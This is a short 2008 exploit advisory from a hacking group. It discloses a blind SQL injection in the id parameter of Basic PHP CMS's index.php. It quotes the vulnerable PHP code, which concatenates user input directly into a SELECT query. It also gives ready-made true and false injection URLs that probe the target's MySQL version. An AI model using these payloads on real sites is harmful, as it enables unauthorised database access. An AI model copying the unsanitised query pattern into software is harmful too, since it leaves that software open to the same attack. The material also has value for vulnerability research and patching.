basicphpcms-sql.txt

`==================================================================  
Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability  
==================================================================  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
  
AUTHOR : CWH Underground  
DATE : 27 November 2008  
SITE : cwh.citec.us  
  
  
#####################################################  
APPLICATION : Basic PHP CMS  
DOWNLOAD : http://www.content-management-software.us/basiccms.zip  
#####################################################  
  
--- Blind SQL Injection ---  
  
-----------------------------  
Vulnerable File (index.php)  
-----------------------------  
  
if ($strID != "")  
{  
$strsql = "SELECT description ";  
$strsql .=" FROM pages_t_details ";  
$strsql .=" WHERE id=$strID";  
$conclass =new DataBase();  
$rst= $conclass->Execute ($strsql,$strError);  
if ($strError=="")  
{  
while ($line = mysql_fetch_array($rst, MYSQL_ASSOC))   
{  
$strDetails=$line['description'];  
}  
}  
  
}  
  
---------  
Exploit  
---------  
  
Test Blind SQL Injection in MYSQL Version 5  
  
True  
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--  
  
False  
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--  
  
  
#######################################################################################  
Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
`